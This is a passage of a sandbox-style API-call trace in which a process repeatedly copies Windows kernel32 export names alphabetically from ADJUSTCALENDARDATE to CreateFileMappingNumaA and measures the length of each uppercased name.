lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.104] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.104] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.104] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.104] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.104] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.104] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.105] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.105] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.105] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.105] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.105] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.105] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.105] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.105] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.105] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.105] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.105] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.105] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.105] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.105] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.105] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.105] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.105] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.105] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.105] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.106] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.106] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.106] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.106] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.106] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.106] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.106] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.106] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.106] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.106] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.106] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.106] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.106] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.106] lstrlenA (lpString="BEEP") returned 4 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.106] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.106] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.106] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.106] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.106] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.107] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.107] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.107] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.107] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.107] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.107] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.107] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.107] lstrlenA (lpString="CANCELIO") returned 8 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.107] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.107] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.107] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.107] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.107] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.107] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.107] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.107] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.107] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.107] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.107] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.108] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.108] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.108] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.108] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.108] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.108] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.108] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.108] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.108] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.108] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.108] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.108] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.108] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.109] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.109] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.109] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.109] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.109] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.109] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.109] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.109] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.109] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.109] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.109] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.109] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.109] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.109] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.109] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.109] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.109] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.109] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.110] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.110] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.110] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.110] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.110] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.110] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.110] lstrlenA (lpString="COPYFILEA") returned 9 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.110] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.110] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.110] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.110] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.110] lstrlenA (lpString="COPYFILEW") returned 9 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.110] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.110] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.110] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.110] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.110] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.110] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.110] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.110] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.111] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.111] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.111] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.111] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.111] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.111] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.111] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.111] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.111] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.111] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.111] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.111] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.111] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.111] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.111] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.111] lstrcpyA (in: 